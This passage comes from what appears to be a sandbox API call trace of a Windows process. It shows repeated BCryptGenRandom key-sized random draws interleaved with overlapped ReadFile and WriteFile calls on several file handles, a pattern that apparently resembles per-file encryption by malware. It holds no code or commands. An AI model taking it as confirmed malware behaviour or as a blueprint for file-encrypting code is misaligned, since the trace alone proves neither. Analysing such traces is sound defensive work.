hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0144.578] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.578] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.579] free (_Block=0x3e305b8) [0144.579] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.579] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.579] free (_Block=0x1fa91d0) [0144.579] free (_Block=0x1fa2ed8) [0144.579] free (_Block=0x1fa90b8) [0144.579] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.579] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.581] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4070, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.581] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.593] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2c4c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.594] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.594] CloseHandle (hObject=0x170) returned 1 [0144.594] free (_Block=0x3df0008) [0144.594] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.604] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.604] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0144.604] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.605] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0144.605] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.608] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.608] free (_Block=0x3e305b8) [0144.608] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.608] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.608] free (_Block=0x1fa91d0) [0144.608] free (_Block=0x1fa2ed8) [0144.608] free (_Block=0x1fa90b8) [0144.608] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.608] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.610] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4030, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.610] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.635] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3eb4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.636] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.667] CloseHandle (hObject=0x170) returned 1 [0144.667] free (_Block=0x3df0008) [0144.667] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.671] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2a80, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0144.675] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.675] CloseHandle (hObject=0x2a4) returned 1 [0144.676] free (_Block=0x1ff1e60) [0144.676] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.692] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.693] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0144.693] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.693] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0144.694] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.694] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.694] free (_Block=0x3e305b8) [0144.694] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.694] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.694] free (_Block=0x1fa91d0) [0144.694] free (_Block=0x1fa2ed8) [0144.694] free (_Block=0x1fa90b8) [0144.694] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0144.695] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.701] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.701] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.712] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.713] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0144.713] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.713] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0144.713] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.714] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.714] free (_Block=0x3e305b8) [0144.714] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.714] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.714] free (_Block=0x1fa91d0) [0144.714] free (_Block=0x1fa2ed8) [0144.714] free (_Block=0x1fa90b8) [0144.714] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0144.715] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.726] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.726] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0144.726] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.727] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0144.727] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.727] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.727] free (_Block=0x3e305b8) [0144.727] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.727] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.728] free (_Block=0x1fa91d0) [0144.728] free (_Block=0x1fa2ed8) [0144.728] free (_Block=0x1fa90b8) [0144.728] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0144.728] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.740] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.741] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0144.741] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.741] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0144.742] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.742] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.742] free (_Block=0x3e305b8) [0144.742] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.742] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.742] free (_Block=0x1fa91d0) [0144.742] free (_Block=0x1fa2ed8) [0144.742] free (_Block=0x1fa90b8) [0144.742] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.743] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.754] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.755] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.755] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0144.755] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.756] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.756] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0144.756] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.756] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.756] free (_Block=0x3e305b8) [0144.756] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.756] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.757] free (_Block=0x1fa91d0) [0144.757] free (_Block=0x1fa2ed8) [0144.757] free (_Block=0x1fa90b8) [0144.757] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0144.757] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0144.765] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.766] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0144.767] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.767] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0144.767] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.767] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.767] free (_Block=0x3e305b8) [0144.767] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.768] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.768] free (_Block=0x1fa91d0) [0144.768] free (_Block=0x1fa2ed8) [0144.768] free (_Block=0x1fa90b8) [0144.768] WriteFile (in: hFile=0xec, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0144.768] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0145.953] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x6690, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0145.953] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0145.963] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.964] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0145.964] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.964] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0145.964] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0145.964] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0145.964] free (_Block=0x3e305b8) [0145.964] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0145.964] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0145.965] free (_Block=0x1fa91d0) [0145.965] free (_Block=0x1fa2ed8) [0145.965] free (_Block=0x1fa90b8) [0145.965] WriteFile (in: hFile=0x3cc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0145.965] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0145.971] CloseHandle (hObject=0x170) returned 1 [0145.972] free (_Block=0x3d70450) [0145.972] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0145.978] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x544, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0145.978] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0145.988] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.989] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0145.989] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.989] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0145.990] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0145.990] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0145.990] free (_Block=0x3e305b8) [0145.990] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0145.990] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0145.990] free (_Block=0x1fa91d0) [0145.990] free (_Block=0x1fa2ed8) [0145.990] free (_Block=0x1fa90b8) [0145.990] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0145.991] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0145.996] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.996] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0145.997] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.997] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0145.997] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0145.997] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0145.997] free (_Block=0x3e305b8) [0145.997] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0145.997] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0145.998] free (_Block=0x1fa91d0) [0145.998] free (_Block=0x1fa2ed8) [0145.998] free (_Block=0x1fa90b8) [0145.998] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0145.998] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.002] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1ca0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0146.002] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.011] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.012] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0146.012] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.012] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0146.012] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.012] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.012] free (_Block=0x3e305b8) [0146.012] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.013] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.013] free (_Block=0x1fa91d0) [0146.013] free (_Block=0x1fa2ed8) [0146.013] free (_Block=0x1fa90b8) [0146.013] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.013] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.023] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.023] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0146.033] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.033] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0146.033] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.034] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.034] BCryptGenRandom (in: 